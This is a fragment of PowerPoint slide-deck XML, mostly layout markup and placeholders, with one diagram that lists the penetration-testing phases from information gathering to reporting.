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1" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId156"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="412"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34" r:id="rId72"/>
    <p:sldId id="335"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3" r:id="rId149"/>
    <p:sldId id="414" r:id="rId150"/>
    <p:sldId id="415" r:id="rId151"/>
    <p:sldId id="416" r:id="rId152"/>
    <p:sldId id="417" r:id="rId153"/>
    <p:sldId id="418" r:id="rId154"/>
    <p:sldId id="419" r:id="rId155"/>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F75EC-EEA2-4070-B4FF-E4380BF7C97B}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple2" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent0_1" csCatId="mainScheme" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6FF02635-EA66-432C-AAD6-0E19F5393B03}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Information Gathering</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44C01558-CD0E-4211-B90F-9C5DA45CD2F1}" type="parTrans" cxnId="{0F97A1FB-9A49-4AD4-BFA8-25BAFEDE4502}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{420C8037-D70E-431D-9242-DCAA41E45BA6}" type="sibTrans" cxnId="{0F97A1FB-9A49-4AD4-BFA8-25BAFEDE4502}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02D6CBCF-4923-414B-8091-65E38EB182B1}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Scanning</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E290CDC5-0CF0-466E-895D-3BA68123B455}" type="parTrans" cxnId="{C1DE161E-17EF-487C-91AA-1E98A17A5969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7A158AB-EC09-456D-9D9D-CD19822EBA84}" type="sibTrans" cxnId="{C1DE161E-17EF-487C-91AA-1E98A17A5969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{94D0D187-9211-45EA-B54F-4782EE6ADBDF}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Exploitation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9201DD6-67DE-4724-88EE-F5AC8C04D8BD}" type="parTrans" cxnId="{4FDBAC7A-AC34-4C19-BE15-66A1D63E8FC9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BA2CD81-385F-4CF0-B97D-CE788EA59EC8}" type="sibTrans" cxnId="{4FDBAC7A-AC34-4C19-BE15-66A1D63E8FC9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20007AE9-4742-46CD-A211-EBB30B6EBC64}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Post-Exploitation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{960AEEA1-1207-4CEB-B83F-02B7A0CF6EC8}" type="parTrans" cxnId="{573455B7-9FCF-4EB8-94BE-E70ACE609434}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FA77CDA-679D-482A-9595-30E1761AA577}" type="sibTrans" cxnId="{573455B7-9FCF-4EB8-94BE-E70ACE609434}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB9B7BD7-4830-4547-9ABC-1D54F2019B11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Report</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A1A6205-61E0-4B2F-A8D7-E000B27F3202}" type="parTrans" cxnId="{0697DC9E-3AF4-4CBF-B614-EC97EAAE61E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86ADFAEB-BD0E-42AC-A5CE-78AE302FB023}" type="sibTrans" cxnId="{0697DC9E-3AF4-4CBF-B614-EC97EAAE61E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D08C8C1-AF25-4D4B-B069-9DEA3AECFB3F}" type="pres">
      <dgm:prSet presAssocID="{C91F75EC-EEA2-4070-B4FF-E4380BF7C97B}" presName="CompostProcess" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{67817B20-9174-4DA9-B0EE-775A101E3F0A}" type="pres">
      <dgm:prSet presAssocID="{C91F75EC-EEA2-4070-B4FF-E4380BF7C97B}" presName="arrow" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1DAF4BF1-AF93-4B01-8ABC-873ED74FCF52}" type="pres">
      <dgm:prSet presAssocID="{C91F75EC-EEA2-4070-B4FF-E4380BF7C97B}" presName="linearProcess" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6A91223C-3220-4220-ADF4-A480BFD4383C}" type="pres">
      <dgm:prSet presAssocID="{6FF02635-EA66-432C-AAD6-0E19F5393B03}" presName="textNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{18B49935-2E98-4A29-B61F-DA23CD3BECEA}" type="pres">
      <dgm:prSet presAssocID="{420C8037-D70E-431D-9242-DCAA41E45BA6}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{69818D37-0458-4F27-9716-744D5E07B841}" type="pres">
      <dgm:prSet presAssocID="{02D6CBCF-4923-414B-8091-65E38EB182B1}" presName="textNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DBE0C32D-ACC5-410A-9634-150E626304D7}" type="pres">
      <dgm:prSet presAssocID="{E7A158AB-EC09-456D-9D9D-CD19822EBA84}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B3061AD9-619A-4FD8-A840-2C437DBED412}" type="pres">
      <dgm:prSet presAssocID="{94D0D187-9211-45EA-B54F-4782EE6ADBDF}" presName="textNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CDF9A497-9287-43BE-BD07-CB59BF6C83CB}" type="pres">
      <dgm:prSet presAssocID="{7BA2CD81-385F-4CF0-B97D-CE788EA59EC8}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{877A93B4-8DAB-401C-A129-D0C576AE0706}" type="pres">
      <dgm:prSet presAssocID="{20007AE9-4742-46CD-A211-EBB30B6EBC64}" presName="textNode" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8A584BD7-DDC7-4721-8C7E-E19B8DA9F716}" type="pres">
      <dgm:prSet presAssocID="{5FA77CDA-679D-482A-9595-30E1761AA577}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{15AE60F8-2F8D-4790-AFE6-422B51762354}" type="pres">
      <dgm:prSet presAssocID="{AB9B7BD7-4830-4547-9ABC-1D54F2019B11}" presName="textNode" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{43103A04-3872-46A2-A3B9-C990290D067E}" type="presOf" srcId="{02D6CBCF-4923-414B-8091-65E38EB182B1}" destId="{69818D37-0458-4F27-9716-744D5E07B841}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{C1DE161E-17EF-487C-91AA-1E98A17A5969}" srcId="{C91F75EC-EEA2-4070-B4FF-E4380BF7C97B}" destId="{02D6CBCF-4923-414B-8091-65E38EB182B1}" srcOrd="1" destOrd="0" parTransId="{E290CDC5-0CF0-466E-895D-3BA68123B455}" sibTransId="{E7A158AB-EC09-456D-9D9D-CD19822EBA84}"/>
    <dgm:cxn modelId="{5070B630-3896-4F21-9520-97037C610521}" type="presOf" srcId="{6FF02635-EA66-432C-AAD6-0E19F5393B03}" destId="{6A91223C-3220-4220-ADF4-A480BFD4383C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{B2FB843E-9309-4173-BF9B-719FBFC01F6C}" type="presOf" srcId="{94D0D187-9211-45EA-B54F-4782EE6ADBDF}" destId="{B3061AD9-619A-4FD8-A840-2C437DBED412}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{90D8E852-8A1E-4EA3-AAF6-CD90A5C9A011}" type="presOf" srcId="{AB9B7BD7-4830-4547-9ABC-1D54F2019B11}" destId="{15AE60F8-2F8D-4790-AFE6-422B51762354}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{4FDBAC7A-AC34-4C19-BE15-66A1D63E8FC9}" srcId="{C91F75EC-EEA2-4070-B4FF-E4380BF7C97B}" destId="{94D0D187-9211-45EA-B54F-4782EE6ADBDF}" srcOrd="2" destOrd="0" parTransId="{C9201DD6-67DE-4724-88EE-F5AC8C04D8BD}" sibTransId="{7BA2CD81-385F-4CF0-B97D-CE788EA59EC8}"/>
    <dgm:cxn modelId="{0697DC9E-3AF4-4CBF-B614-EC97EAAE61E6}" srcId="{C91F75EC-EEA2-4070-B4FF-E4380BF7C97B}" destId="{AB9B7BD7-4830-4547-9ABC-1D54F2019B11}" srcOrd="4" destOrd="0" parTransId="{7A1A6205-61E0-4B2F-A8D7-E000B27F3202}" sibTransId="{86ADFAEB-BD0E-42AC-A5CE-78AE302FB023}"/>
    <dgm:cxn modelId="{810801A6-0300-46D0-BD2F-01D1E98080AF}" type="presOf" srcId="{C91F75EC-EEA2-4070-B4FF-E4380BF7C97B}" destId="{0D08C8C1-AF25-4D4B-B069-9DEA3AECFB3F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{573455B7-9FCF-4EB8-94BE-E70ACE609434}" srcId="{C91F75EC-EEA2-4070-B4FF-E4380BF7C97B}" destId="{20007AE9-4742-46CD-A211-EBB30B6EBC64}" srcOrd="3" destOrd="0" parTransId="{960AEEA1-1207-4CEB-B83F-02B7A0CF6EC8}" sibTransId="{5FA77CDA-679D-482A-9595-30E1761AA577}"/>
    <dgm:cxn modelId="{8027C7C5-8945-41B3-8D86-B6D782766A9B}" type="presOf" srcId="{20007AE9-4742-46CD-A211-EBB30B6EBC64}" destId="{877A93B4-8DAB-401C-A129-D0C576AE0706}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{0F97A1FB-9A49-4AD4-BFA8-25BAFEDE4502}" srcId="{C91F75EC-EEA2-4070-B4FF-E4380BF7C97B}" destId="{6FF02635-EA66-432C-AAD6-0E19F5393B03}" srcOrd="0" destOrd="0" parTransId="{44C01558-CD0E-4211-B90F-9C5DA45CD2F1}" sibTransId="{420C8037-D70E-431D-9242-DCAA41E45BA6}"/>
    <dgm:cxn modelId="{2D73A163-EF01-4FF5-B9C2-A96B08515866}" type="presParOf" srcId="{0D08C8C1-AF25-4D4B-B069-9DEA3AECFB3F}" destId="{67817B20-9174-4DA9-B0EE-775A101E3F0A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{49ECB9E1-2CC0-4767-A66A-5BA71E7755E7}" type="presParOf" srcId="{0D08C8C1-AF25-4D4B-B069-9DEA3AECFB3F}" destId="{1DAF4BF1-AF93-4B01-8ABC-873ED74FCF52}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{F3D7A088-CF37-4639-AA98-44EA0F21F6E6}" type="presParOf" srcId="{1DAF4BF1-AF93-4B01-8ABC-873ED74FCF52}" destId="{6A91223C-3220-4220-ADF4-A480BFD4383C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{3EC312BE-05E2-492A-8A32-3B1B4832110C}" type="presParOf" srcId="{1DAF4BF1-AF93-4B01-8ABC-873ED74FCF52}" destId="{18B49935-2E98-4A29-B61F-DA23CD3BECEA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{4451003C-9FAE-4DFC-889E-D9AEF8F203B8}" type="presParOf" srcId="{1DAF4BF1-AF93-4B01-8ABC-873ED74FCF52}" destId="{69818D37-0458-4F27-9716-744D5E07B841}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{1D43C6DB-44CD-4126-B342-E48FFCB50687}" type="presParOf" srcId="{1DAF4BF1-AF93-4B01-8ABC-873ED74FCF52}" destId="{DBE0C32D-ACC5-410A-9634-150E626304D7}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{5C56AED7-3DA4-4E7B-A6D9-A96A325C68EE}" type="presParOf" srcId="{1DAF4BF1-AF93-4B01-8ABC-873ED74FCF52}" destId="{B3061AD9-619A-4FD8-A840-2C437DBED412}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{C6B4286A-299C-41C6-ABC3-B7F399A9F90A}" type="presParOf" srcId="{1DAF4BF1-AF93-4B01-8ABC-873ED74FCF52}" destId="{CDF9A497-9287-43BE-BD07-CB59BF6C83CB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{781A1DB8-D4C6-46A1-8FDA-6D4EC754CEB5}" type="presParOf" srcId="{1DAF4BF1-AF93-4B01-8ABC-873ED74FCF52}" destId="{877A93B4-8DAB-401C-A129-D0C576AE0706}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{2FB02972-2271-4215-B6D7-D715A9ECDEA4}" type="presParOf" srcId="{1DAF4BF1-AF93-4B01-8ABC-873ED74FCF52}" destId="{8A584BD7-DDC7-4721-8C7E-E19B8DA9F716}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{C0F73870-E77E-465C-8CF8-768D77C3F3C5}" type="presParOf" srcId="{1DAF4BF1-AF93-4B01-8ABC-873ED74FCF52}" destId="{15AE60F8-2F8D-4790-AFE6-422B5176235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17B20-9174-4DA9-B0EE-775A101E3F0A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="571499" y="0"/>
          <a:ext cx="6477000" cy="4373563"/>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1223C-3220-4220-ADF4-A480BFD4383C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3348" y="1312068"/>
          <a:ext cx="1464096" cy="174942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Information Gathering</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="74819" y="1383539"/>
        <a:ext cx="1321154" cy="1606483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{69818D37-0458-4F27-9716-744D5E07B841}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1540650" y="1312068"/>
          <a:ext cx="1464096" cy="174942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Scanning</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1612121" y="1383539"/>
        <a:ext cx="1321154" cy="1606483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B3061AD9-619A-4FD8-A840-2C437DBED412}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3077951" y="1312068"/>
          <a:ext cx="1464096" cy="174942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Exploitation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3149422" y="1383539"/>
        <a:ext cx="1321154" cy="1606483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{877A93B4-8DAB-401C-A129-D0C576AE0706}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4615253" y="1312068"/>
          <a:ext cx="1464096" cy="174942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Post-Exploitation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4686724" y="1383539"/>
        <a:ext cx="1321154" cy="1606483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{15AE60F8-2F8D-4790-AFE6-422B51762354}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6152554" y="1312068"/>
          <a:ext cx="1464096" cy="174942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Report</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6224025" y="1383539"/>
        <a:ext cx="1321154" cy="16064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281488" y="0"/>
            <a:ext cx="3276600" cy="534988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2D64DDD6-33D5-498A-B940-F96013A67D4C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/24/2018</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>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281488" y="10155238"/>
            <a:ext cx="3276600" cy="534987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D5A185E0-E92A-48A8-81DD-0E974A1274BD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19836183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278A4B-0BA1-4A0F-8B0D-60E4A936397E}"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4394B-7EFF-4469-A0D6-8C4AB3A06646}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309546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5" name="Footer Placeholder 4"/>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6" name="Slide Number Placeholder 5"/>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2331701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5" name="Footer Placeholder 4"/>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6" name="Slide Number Placeholder 5"/>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3211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5" name="Footer Placeholder 4"/>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6" name="Slide Number Placeholder 5"/>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142627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5" name="Footer Placeholder 4"/>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6" name="Slide Number Placeholder 5"/>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193742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6" name="Footer Placeholder 5"/>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7" name="Slide Number Placeholder 6"/>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419483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8" name="Footer Placeholder 7"/>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9" name="Slide Number Placeholder 8"/>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283942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278A4B-0BA1-4A0F-8B0D-60E4A936397E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/24/2018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4394B-7EFF-4469-A0D6-8C4AB3A06646}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109698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3" name="Footer Placeholder 2"/>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4" name="Slide Number Placeholder 3"/>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52120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6" name="Footer Placeholder 5"/>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7" name="Slide Number Placeholder 6"/>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61508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nSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>4/10/15</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Footer Text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{A8DFFD0D-C6C7-49C7-885B-AA4EDEB64C97}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1902716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nSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>4/10/15</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nSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Footer Text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nSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{BA37779E-4FB9-453B-B7EE-E9C0FB04A1C2}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113557714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1524360"/>
            <a:ext cx="7772040" cy="4571640"/>
          </a:xfrm>
